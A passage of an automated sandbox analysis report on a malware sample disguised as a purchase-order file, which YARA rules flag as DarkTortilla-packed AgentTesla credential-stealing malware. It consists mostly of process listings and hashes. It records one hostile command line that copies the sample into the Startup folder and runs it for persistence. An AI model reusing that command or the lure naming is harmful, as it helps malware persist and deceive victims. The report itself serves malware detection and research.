Imagebase:	0x940000
File size:	731'136 bytes
MD5 hash:	D9B0EE244191E7FCE879415F619E88C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2574686488.0000000006610000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2572021121.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2566518766.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2566518766.0000000002EAD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:39:44
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /c ping 127.0.0.1 -n 38 > nul && copy "C:\Users\user\Desktop\Drawing specification and June PO #07329.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" && ping 127.0.0.1 -n 38 > nul && "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:39:44
Start date:	02/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:39:44
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 38
Imagebase:	0x1e0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:40:21
Start date:	02/07/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 38
Imagebase:	0x1e0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:40:32
Start date:	02/07/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Imagebase:	0xba0000
File size:	731'136 bytes
MD5 hash:	D9B0EE244191E7FCE879415F619E88C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000C.00000002.4674651066.0000000003973000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	10:40:59
Start date:	02/07/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe"
Imagebase:	0xba0000
File size:	731'136 bytes
MD5 hash:	D9B0EE244191E7FCE879415F619E88C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:41:09
Start date:	02/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x490000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4659098150.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	10:41:35
Start date:	02/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x410000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:41:38
Start date:	02/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xfd0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	18.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	55
Total number of Limit Nodes:	9

Executed Functions

Function 07D61127 Relevance: 5.6, Instructions: 5649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2575811840.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d60000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69bda826a16148a311fc84f5cbc341a524ca9fb60a3c204176cb1289f870d1aa
Instruction ID: 3943619971a5a3eba42d6db132280e390f291ce7b4197575f573d32624a76e6c
Opcode Fuzzy Hash: 69bda826a16148a311fc84f5cbc341a524ca9fb60a3c204176cb1289f870d1aa
Instruction Fuzzy Hash: C6C32770A12218CFCB58EF39D9996ACBBB2BF89310F4045E9D048A7754EB345E84CF56

Function 07D61140 Relevance: 5.6, Instructions: 5633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2575811840.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d60000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b76d74c5ce8ae3430a64993639e3aa40b769f42fd8dfa675c5bd8607ada8ef47
Instruction ID: 64968ac512ff3a7dfb79851db132f74f63648388944f0204ff901a6e5cbf457d
Opcode Fuzzy Hash: b76d74c5ce8ae3430a64993639e3aa40b769f42fd8dfa675c5bd8607ada8ef47
Instruction Fuzzy Hash: 9BC32770A12218CFCB58EF39D9996ACBBB2BF89310F4045E9D048A7754EB345E84CF56

Function 08711408 Relevance: 5.2, Instructions: 5170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2576703119.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8710000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf2250b79f46701965bf1ac3a32ea302663230fec5b47c94127c68b516c229c7
Instruction ID: 3b8da09c207e838d7e73d9292d4bf6c5fc1cf780f5aae06ebed87e87724d3882
Opcode Fuzzy Hash: bf2250b79f46701965bf1ac3a32ea302663230fec5b47c94127c68b516c229c7
Instruction Fuzzy Hash: 43B30870A11258CBCB58EF39D9986ACBBB2FB89200F5185EED488A3754DF345E84CF45

Function 07D6E3F0 Relevance: 2.2, Strings: 1, Instructions: 932COMMON

Download Yara Rule

Strings

], xrefs: 07D6E9FE

Memory Dump Source

Source File: 00000000.00000002.2575811840.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d60000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID: ]
API String ID: 0-3352871620
Opcode ID: 7059e94309eab86e559bfd969ec2ea535c01c47d939b247adde8bb643fa7320c
Instruction ID: 12d43a80fd18292963f2eae36dc488bc493d96b7b3a62b5c3862a221abda3142
Opcode Fuzzy Hash: 7059e94309eab86e559bfd969ec2ea535c01c47d939b247adde8bb643fa7320c
Instruction Fuzzy Hash: A1729F74B00219CFDB14AF64D868BAEBBB7BF89700F148069E5469B395DB34DC42CB91

Function 066F10AC Relevance: 1.3, Instructions: 1264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f9dfacd14520bba044063a92b9905ed1000308e60f77419b7da478c37727bdb
Instruction ID: 978e25a5f17e8a87f53dea9fa8ecf71a83fd1e94d032e39c82bf9609801574ab
Opcode Fuzzy Hash: 7f9dfacd14520bba044063a92b9905ed1000308e60f77419b7da478c37727bdb
Instruction Fuzzy Hash: 2AB22870A1121ACFCB58FF79D9986AEBBB2BF88300F4045A9D449A7354EB345E84CF51

Function 0870A6B0 Relevance: 1.0, Instructions: 976COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2576593324.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8700000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a82e1d27f76f0cb74286d688cfbaf8bfd6a06f07c8618869be35e64aa4cce2d
Instruction ID: f6c63d495269c4aa02b9e88f380464e5cf7c895f86b85ec227846d787f6ac471
Opcode Fuzzy Hash: 2a82e1d27f76f0cb74286d688cfbaf8bfd6a06f07c8618869be35e64aa4cce2d
Instruction Fuzzy Hash: 9072D1317042048FDB18EB78C86476E7BE6AFC9210F248569E15ADB3D5CE34DC46CBA1

Function 07D6C144 Relevance: 1.0, Instructions: 961COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2575811840.0000000007D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d60000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d97afa81abf2d7057b1ffb90d3793b2e9de2eb77873ea94a3b83f7d22c18383
Instruction ID: 3a3134e5f06aac86190381d111c7a5e59fe808574cd2e7e15dc52dad135be724
Opcode Fuzzy Hash: 4d97afa81abf2d7057b1ffb90d3793b2e9de2eb77873ea94a3b83f7d22c18383
Instruction Fuzzy Hash: 3272C031B11256CFCB18BBB9ED9876EBBB6AF88300F4085A9D448E7744EE349C44CB55

Function 01448819 Relevance: .9, Instructions: 918COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565433804.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418e82c8e387fdea62c5ea0c3c40ea58d5413048e323e9cefd4652605f656324
Instruction ID: f3cc5f559afc764dced8661e432bbe63b970fe47e898f7ce364f08e766037850
Opcode Fuzzy Hash: 418e82c8e387fdea62c5ea0c3c40ea58d5413048e323e9cefd4652605f656324
Instruction Fuzzy Hash: 52823B70A0020ADFEB15CFA8C984AAEBBF2FF89314F15855AE5459B3A1D730ED41CB50

Function 01447AD8 Relevance: .9, Instructions: 912COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565433804.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63361772ce39466cb9d104f7fb1ce1694fb83673115c64d79b69464f4f7fdf55
Instruction ID: b5a89b89214ea25b65c6cf8f14a2d3edb8ae35095437f241a6bd18b389da59ab
Opcode Fuzzy Hash: 63361772ce39466cb9d104f7fb1ce1694fb83673115c64d79b69464f4f7fdf55
Instruction Fuzzy Hash: 5D726071A00209DFEB15DFA9C854AAEBBF6FF88310F14855AE545AB361DB30DD42CB90

Function 08702388 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2576593324.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8700000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f38ab6fb68d2e46261ce60dce1efb41fc7c8594927592a670e48296f8834f7f
Instruction ID: 10ad756a1dd1a620aa1a39c7b3c01352f9221be2cac9c10c3d2e58b63957dbba
Opcode Fuzzy Hash: 8f38ab6fb68d2e46261ce60dce1efb41fc7c8594927592a670e48296f8834f7f
Instruction Fuzzy Hash: B1525D34A00645CFDB14DF28C854B99B7F2FF8A314F2582A9D5586F3A1DB71A986CF80

Function 08702363 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2576593324.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8700000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee3cfe63222c192afa4d3a091cc28e8136860fbd8f2cadbb9b7c473e70c63ff
Instruction ID: f871c18e5339fb966ddf41db4c58139d8fa591cc2de5d92a763435120b62c380
Opcode Fuzzy Hash: 9ee3cfe63222c192afa4d3a091cc28e8136860fbd8f2cadbb9b7c473e70c63ff
Instruction Fuzzy Hash: CE526034A00745CFDB14DF28C854B98B7B2FF8A314F1582A9D5586F3A2DB71A986CF81

Function 0871B13F Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2576703119.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8710000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddfeccc3e4f4010b693ddbaa3dbe55c823f29430dc91df4383414eb52690aa49
Instruction ID: b861f3230956c9de021eb57278820206134b938908ac9680cbb6564d249ed848
Opcode Fuzzy Hash: ddfeccc3e4f4010b693ddbaa3dbe55c823f29430dc91df4383414eb52690aa49
Instruction Fuzzy Hash: 1AC1A730B04305CBDF249F3D945433A7AA6AFC5B62F98491DE486D6A9DCB34C8828775

Function 01444769 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565433804.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74469bd423889f061f4f037f0179f0d21fcf65478bdb7af65be9ae179a4fbea3
Instruction ID: 2cd193471f9a74289609f0512945a0258dc9f6aa50bc5627e31ba3ccd2f09be5
Opcode Fuzzy Hash: 74469bd423889f061f4f037f0179f0d21fcf65478bdb7af65be9ae179a4fbea3
Instruction Fuzzy Hash: F8E1C574E00258CFEB14CFA9C854BAEBBF2BF89300F1481AAD549AB365DB345985CF51

Function 0144AEC0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565433804.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2618511ad936e52189ef549bd8910f12fc2badf3bd12647e926b2556985fc57b
Instruction ID: ca54161dc1046a2bbbed9a5e36a5bdf830546424e85bb9da28b5dc8e2a12ce64
Opcode Fuzzy Hash: 2618511ad936e52189ef549bd8910f12fc2badf3bd12647e926b2556985fc57b
Instruction Fuzzy Hash: B0614DB1E002099FEB14CFA9C494AAEFBF2FF89311F24806AE515A7361D7319941CB90

Function 0144AF11 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2565433804.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1440000_Drawing specification and June PO #07329.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8270bf09fa80d98825086ef0e1e93ce9d669e448a4681bd2b998451dad15178
Instruction ID: 90d26ce86817235561fd6271feddfc2f6eb3d8a80e24c92d64536c7a1f133070
Opcode Fuzzy Hash: e8270bf09fa80d98825086ef0e1e93ce9d669e448a4681bd2b998451dad15178
Instruction Fuzzy Hash: 0441C2B1E012099FEB14CFAAD58469EBBF2AF89311F14C06AE415A7360DB359942CF50

Function 066F8450 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 066F86A6

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 50bd35f3561a9ea09f88a887bb23a6f919154f28a712d25836a987509f788833
Instruction ID: 3aa5d5c13da277706fd5b446e8505a07cb432516cfdcfebe35a7bc5d46f190bf
Opcode Fuzzy Hash: 50bd35f3561a9ea09f88a887bb23a6f919154f28a712d25836a987509f788833
Instruction Fuzzy Hash: 13714670A20B058FDBA4DF29D45479ABBF1FF88200F00896DE59ADBB40DB75E845CB90

Function 066FED44 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066FEE62

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 984481a9a8129df8497c5eede0af4908f7b986d9329984319a74f25b35e1623f
Instruction ID: 8c4b0e577393c348bb7975951e8166b47ce1d99b58785474ea0f6f9d806c6b29
Opcode Fuzzy Hash: 984481a9a8129df8497c5eede0af4908f7b986d9329984319a74f25b35e1623f
Instruction Fuzzy Hash: 7451BEB1D10349EFDB14CFA9D884ADEBFB5BF88310F24812AE919AB210D7759945CF90

Function 066FED50 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066FEE62

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d6bcec89972fe334ed2f58af9ff6f665bfaf4749f38ce3a1ef2d723eac8aa83b
Instruction ID: 540bb990bfce6db45542d5bac18534cd3f8e0878370c0bbe5c1b05742bd0eb03
Opcode Fuzzy Hash: d6bcec89972fe334ed2f58af9ff6f665bfaf4749f38ce3a1ef2d723eac8aa83b
Instruction Fuzzy Hash: 8E41B0B1D10349EFDB14CF99D884ADEBFB5BF88310F24812AE919AB210D775A945CF90

Function 066E0C70 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 066E0D31

Memory Dump Source

Source File: 00000000.00000002.2574974923.00000000066E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66e0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 905b9655863486a2762bce118e4bf1dc31ef62bf3b0e85484a073b0bacc93ec2
Instruction ID: 21af82b17c1367f75f0439a3bb820b82c147658545902fc03341f61c05cc3437
Opcode Fuzzy Hash: 905b9655863486a2762bce118e4bf1dc31ef62bf3b0e85484a073b0bacc93ec2
Instruction Fuzzy Hash: 0A4159B8A00309DFDB54CF89C448AAABBF5FF88314F24C459E519AB321D375A851CFA0

Function 066FAD28 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066FADB7

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 72c24368ca34697890e52b565bc341fc8e40ece18e3f599150e428916707957f
Instruction ID: a660bb190d3fed7bdac477cc70732382cb1dabfc62252a776dbf91b959d933f9
Opcode Fuzzy Hash: 72c24368ca34697890e52b565bc341fc8e40ece18e3f599150e428916707957f
Instruction Fuzzy Hash: 922103B5901248DFDB10CFA9D984ADEBBF8EF08310F14841AE918A3350C378A940CFA4

Function 07D9AA38 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07D9AA9D

Memory Dump Source

Source File: 00000000.00000002.2575908861.0000000007D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d90000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b67597861b602984e51ba3616b7081e937561cc8ab84ac6da089f328a3c6e144
Instruction ID: d60cc5c4d8aa7ca1dc3563b05cd9b43540fcfd0e455c62e2a48515feae5c420f
Opcode Fuzzy Hash: b67597861b602984e51ba3616b7081e937561cc8ab84ac6da089f328a3c6e144
Instruction Fuzzy Hash: 292156BA800209DFCB10DF99D945BDEFBF8FB88320F21841AE558A7610C7356545CFA5

Function 066FAD30 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066FADB7

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ab7d071175a264d9d44d7a21617bf5abea3d026a5bff3e003d104ff52533ff5f
Instruction ID: ab4524c9ec713ea521f25659ec0fc55b5904141712c30209807bfc6facac6e1e
Opcode Fuzzy Hash: ab7d071175a264d9d44d7a21617bf5abea3d026a5bff3e003d104ff52533ff5f
Instruction Fuzzy Hash: E421C4B5900249DFDB10CFAAD984ADEBBF8EB48310F14841AE918A7350D378A954CFA5

Function 087190A0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 08719110

Memory Dump Source

Source File: 00000000.00000002.2576703119.0000000008710000.00000040.00000800.00020000.00000000.sdmp, Offset: 08710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8710000_Drawing specification and June PO #07329.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 1cc0e425fc41348ecce89c8168915dcafaecdba5c776646e2d0737505421b440
Instruction ID: 8c84aaef263325bfd1f9244c0ead6d260138bf848d096928682cb91a251345fa
Opcode Fuzzy Hash: 1cc0e425fc41348ecce89c8168915dcafaecdba5c776646e2d0737505421b440
Instruction Fuzzy Hash: DB1122B1C0065ADBDB10CFAAC445B9EFBB4AF48720F11812AD918A7740D778AA44CFA5

Function 066F7808 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,066F8721,00000800,00000000,00000000), ref: 066F8932

Memory Dump Source

Source File: 00000000.00000002.2575021494.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_66f0000_Drawing specification and June PO #07329.jbxd

Similarity

